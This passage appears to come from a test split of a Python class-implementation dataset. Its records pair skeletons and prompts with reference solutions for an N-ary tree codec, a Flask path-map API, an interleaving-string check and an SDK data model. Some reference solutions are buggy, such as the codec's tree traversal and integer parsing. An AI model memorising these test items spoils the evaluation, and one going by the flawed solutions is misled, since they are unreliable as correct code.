<|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return ''\n q = []\n\n def preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\n preorder(root)\n return ','.join(map(str, q))\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n data = deque(data.split(','))\n root = Node(int(data.popleft()), [])\n\n def solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\n solve(root)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000271", "length_bytes": 1377, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. 
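The MetricValue record that closes above is a thin deserialization model, but note one wrinkle it preserves from the SDK source: from_dictionary is written as def from_dictionary(cls, dictionary) and returns cls(...), yet the stored skeleton carries no @classmethod decorator, so as written it would not actually run as a classmethod. A minimal runnable sketch of the intended shape follows; the Value stand-in and the sample metric name are illustrative assumptions, since the SDK's Value model is not shown in this dump.

class Value:
    """Stand-in for cohesity_management_sdk.models.value.Value (assumed shape)."""

    def __init__(self, data=None):
        self.data = data

    @classmethod
    def from_dictionary(cls, dictionary):
        if dictionary is None:
            return None
        return cls(dictionary.get('data'))


class MetricValue:
    """One data point of a metric, per the record above."""

    def __init__(self, metric_name=None, timestamp_msecs=None, value=None):
        self.metric_name = metric_name
        self.timestamp_msecs = timestamp_msecs
        self.value = value

    @classmethod  # missing in the stored skeleton, but implied by the use of `cls`
    def from_dictionary(cls, dictionary):
        if dictionary is None:
            return None
        value = Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None
        return cls(dictionary.get('metricName'), dictionary.get('timestampMsecs'), value)


# 'kIops' is an illustrative metric name, not taken from the record.
mv = MetricValue.from_dictionary(
    {'metricName': 'kIops', 'timestampMsecs': 1700000000000, 'value': {'data': 42}})
assert mv.metric_name == 'kIops' and mv.value.data == 42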
:type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return ''\n q = []\n\n def preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\n preorder(root)\n return ','.join(map(str, q))\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n data = deque(data.split(','))\n root = Node(int(data.popleft()), [])\n\n def solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\n solve(root)\n return root\n<|end_body_1|>\n", "revision_id": "48ba21799f63225c104f649c3871444a29ab978a", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n if root is None:\n return ''\n q = []\n\n def preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\n preorder(root)\n return ','.join(map(str, q))\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n if data == '':\n return None\n data = deque(data.split(','))\n root = Node(int(data.popleft()), [])\n\n def solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\n solve(root)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "archive/428. 
Serialize and Deserialize N-ary Tree.py", "source_repo": "doraemon1293/Leetcode", "split": "test", "star_events_count": 0} {"blob_id": "965bcf457c6d6c424f9bd74f8b96fc491108547e", "bodies": ["tagname = g.json.pop('tag', None)\nif tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\npathmap = PathMap(**g.json)\nif tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\ndb.session.add(pathmap)\ndb.session.commit()\nout = pathmap.to_dict(unpack_relationships=False)\nif pathmap.tag:\n out['tag'] = pathmap.tag.tag\nlogger.info('New pathmap created with values: %r', pathmap)\nreturn (jsonify(out), CREATED)", "query = PathMap.query\nfor_agent = get_uuid_argument('for_agent')\nif for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\nlogger.debug('Query: %s', str(query))\noutput = []\nfor map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\nreturn (jsonify(output), OK)"], "bodies_text": "<|body_start_0|>\n tagname = g.json.pop('tag', None)\n if tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\n pathmap = PathMap(**g.json)\n if tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\n db.session.add(pathmap)\n db.session.commit()\n out = pathmap.to_dict(unpack_relationships=False)\n if pathmap.tag:\n out['tag'] = pathmap.tag.tag\n logger.info('New pathmap created with values: %r', pathmap)\n return (jsonify(out), CREATED)\n<|end_body_0|>\n\n<|body_start_1|>\n query = PathMap.query\n for_agent = get_uuid_argument('for_agent')\n if for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\n logger.debug('Query: %s', str(query))\n output = []\n for map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\n return (jsonify(output), OK)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "PathMapIndexAPI", "detected_licenses": ["BSD-3-Clause", "Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PathMapIndexAPI:\n\n def post(self):\n \"\"\"A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\"\"\"\n <|body_0|>\n\n def get(self):\n \"\"\"A ``GET`` to this endpoint will return a list of all registered path maps, with id. 
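The Codec record that closes above (LeetCode 428, Serialize and Deserialize N-ary Tree) carries the same two bugs in every stored copy of its bodies: for child in (root, children): walks a two-element tuple (and children is not even defined) instead of root.children, and Node(int(val, [])) passes a list as the base argument of int() where Node(int(val), []) is meant. Below is a corrected, runnable sketch of the preorder-with-'#'-sentinel scheme the record describes; the Node class mirrors LeetCode's (val, children) node.

from collections import deque


class Node:
    def __init__(self, val=None, children=None):
        self.val = val
        self.children = children if children is not None else []


class Codec:
    def serialize(self, root):
        if root is None:
            return ''
        q = []

        def preorder(node):
            q.append(node.val)
            for child in node.children:   # record had: for child in (root, children)
                preorder(child)
            q.append('#')                 # sentinel: end of this node's children

        preorder(root)
        return ','.join(map(str, q))

    def deserialize(self, data):
        if data == '':
            return None
        data = deque(data.split(','))
        root = Node(int(data.popleft()), [])

        def solve(node):
            val = data.popleft()
            while val != '#':
                child = Node(int(val), [])  # record had: Node(int(val, []))
                solve(child)
                node.children.append(child)
                val = data.popleft()

        solve(root)
        return root


codec = Codec()
tree = Node(1, [Node(3, [Node(5), Node(6)]), Node(2), Node(4)])
assert codec.serialize(codec.deserialize(codec.serialize(tree))) == codec.serialize(tree)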
It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tagname = g.json.pop('tag', None)\n if tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\n pathmap = PathMap(**g.json)\n if tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\n db.session.add(pathmap)\n db.session.commit()\n out = pathmap.to_dict(unpack_relationships=False)\n if pathmap.tag:\n out['tag'] = pathmap.tag.tag\n logger.info('New pathmap created with values: %r', pathmap)\n return (jsonify(out), CREATED)\n<|end_body_0|>\n\n<|body_start_1|>\n query = PathMap.query\n for_agent = get_uuid_argument('for_agent')\n if for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\n logger.debug('Query: %s', str(query))\n output = []\n for map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\n return (jsonify(output), OK)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000272", "length_bytes": 11366, "license_type": "permissive", "methods": [{"docstring": "A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a", "name": "post", "signature": "def post(self)"}, {"docstring": "A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. 
sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error", "name": "get", "signature": "def get(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002449", "prompt": "Implement the Python class `PathMapIndexAPI` described below.\n\nClass description:\nImplement the PathMapIndexAPI class.\n\nMethod signatures and docstrings:\n- def post(self): A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\n- def get(self): A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error", "prompted_full_text": "Implement the Python class `PathMapIndexAPI` described below.\n\nClass description:\nImplement the PathMapIndexAPI class.\n\nMethod signatures and docstrings:\n- def post(self): A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\n- def get(self): A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. 
sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\n\n<|skeleton|>\nclass PathMapIndexAPI:\n\n def post(self):\n \"\"\"A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\"\"\"\n <|body_0|>\n\n def get(self):\n \"\"\"A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tagname = g.json.pop('tag', None)\n if tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\n pathmap = PathMap(**g.json)\n if tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\n db.session.add(pathmap)\n db.session.commit()\n out = pathmap.to_dict(unpack_relationships=False)\n if pathmap.tag:\n out['tag'] = pathmap.tag.tag\n logger.info('New pathmap created with values: %r', pathmap)\n return (jsonify(out), CREATED)\n<|end_body_0|>\n\n<|body_start_1|>\n query = PathMap.query\n for_agent = get_uuid_argument('for_agent')\n if for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\n logger.debug('Query: %s', str(query))\n output = []\n for map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\n return (jsonify(output), OK)\n<|end_body_1|>\n", "revision_id": "ea04bbcb807eb669415c569417b4b1b68e75d29d", "skeleton": "<|skeleton|>\nclass PathMapIndexAPI:\n\n def post(self):\n \"\"\"A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. 
If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\"\"\"\n <|body_0|>\n\n def get(self):\n \"\"\"A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PathMapIndexAPI:\n def post(self):\n \"\"\"A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\"\"\"\n tagname = g.json.pop('tag', None)\n if tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\n pathmap = PathMap(**g.json)\n if tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\n db.session.add(pathmap)\n db.session.commit()\n out = pathmap.to_dict(unpack_relationships=False)\n if pathmap.tag:\n out['tag'] = pathmap.tag.tag\n logger.info('New pathmap created with values: %r', pathmap)\n return (jsonify(out), CREATED)\n\n def get(self):\n \"\"\"A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. 
sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\"\"\"\n query = PathMap.query\n for_agent = get_uuid_argument('for_agent')\n if for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\n logger.debug('Query: %s', str(query))\n output = []\n for map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\n return (jsonify(output), OK)\n", "source": "the_stack_v2_python_sparse", "source_path": "pyfarm/master/api/pathmaps.py", "source_repo": "pyfarm/pyfarm-master", "split": "test", "star_events_count": 2} {"blob_id": "c60575f7850c29aca253a93182fae2a80721fc5d", "bodies": ["m, n, s = (len(s1), len(s2), len(s3))\nif s != m + n:\n return False\ndp = [[False] * (n + 1) for _ in range(m + 1)]\ndp[0][0] = True\nfor i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\nfor i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\nfor i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\nreturn dp[-1][-1]", "m, n, s = (len(s1), len(s2), len(s3))\nif s != m + n:\n return False\ndp = [[False] * (n + 1) for _ in range(m + 1)]\ndp[0][0] = True\nfor i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\nfor i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\nfor i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\nreturn dp[-1][-1]"], "bodies_text": "<|body_start_0|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = False\n return dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i][j - 1]\n elif s1[i - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = 
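The PathMapIndexAPI record's get() turns on one SQLAlchemy idiom: a path map applies to an agent when it is untagged (PathMap.tag == None) or when its tag is attached to that agent (PathMap.tag.has(Tag.agents.any(...))). A self-contained sketch of that filter against in-memory SQLite is below; the table names, integer keys, and single path_linux column are illustrative assumptions, not the pyfarm schema (which uses UUID agent ids and three path columns).

from sqlalchemy import Column, ForeignKey, Integer, String, Table, create_engine, or_
from sqlalchemy.orm import declarative_base, relationship, sessionmaker

Base = declarative_base()

# Hypothetical association table; names are illustrative only.
agent_tags = Table(
    'agent_tags', Base.metadata,
    Column('agent_id', ForeignKey('agents.id'), primary_key=True),
    Column('tag_id', ForeignKey('tags.id'), primary_key=True))


class Agent(Base):
    __tablename__ = 'agents'
    id = Column(Integer, primary_key=True)


class Tag(Base):
    __tablename__ = 'tags'
    id = Column(Integer, primary_key=True)
    tag = Column(String, unique=True)
    agents = relationship('Agent', secondary=agent_tags, backref='tags')


class PathMap(Base):
    __tablename__ = 'pathmaps'
    id = Column(Integer, primary_key=True)
    path_linux = Column(String)
    tag_id = Column(Integer, ForeignKey('tags.id'), nullable=True)
    tag = relationship('Tag')


engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

agent = Agent(id=1)
prod = Tag(tag='production', agents=[agent])
session.add_all([
    PathMap(path_linux='/mnt/nfs'),                        # untagged: applies to everyone
    PathMap(path_linux='/renderout', tag=prod),            # applies to tagged agents only
    PathMap(path_linux='/other', tag=Tag(tag='staging')),  # different tag: filtered out
])
session.commit()

# The same OR filter the record's get() builds for ?for_agent=<id>.
query = session.query(PathMap).filter(
    or_(PathMap.tag == None,  # noqa: E711 -- SQLAlchemy needs `== None` here
        PathMap.tag.has(Tag.agents.any(Agent.id == 1))))
assert sorted(p.path_linux for p in query) == ['/mnt/nfs', '/renderout']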
False\n return dp[-1][-1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_0|>\n\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n \"\"\"dp[i][j] 代表 前i个s1,与前j个s2,是否交错组成前i+j个s3 dp[0][0] = True dp[0][j] dp[j][0] dp[i][j] = dp[i-1_最短回文串.py][j] if s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s3[i+j-1_最短回文串.py] = dp[i-1_最短回文串.py][j] or dp[i][j-1_最短回文串.py] if s2[j-1_最短回文串.py] == s1[i-1_最短回文串.py] == s3[i+j-1_最短回文串.py] res = dp[-1_最短回文串.py][-1_最短回文串.py]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n, s = (len(s1), len(s2), len(s3))\n if s != m + n:\n return False\n dp = [[False] * (n + 1) for _ in range(m + 1)]\n dp[0][0] = True\n for i in range(1, n + 1):\n if s2[i - 1] == s3[i - 1]:\n dp[0][i] = dp[0][i - 1]\n for i in range(1, m + 1):\n if s1[i - 1] == s3[i - 1]:\n dp[i][0] = dp[i - 1][0]\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if s1[i - 1] == s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = dp[i - 1][j] or dp[i][j - 1]\n elif s2[j - 1] == s3[i + j - 1]:\n dp[i][j] = 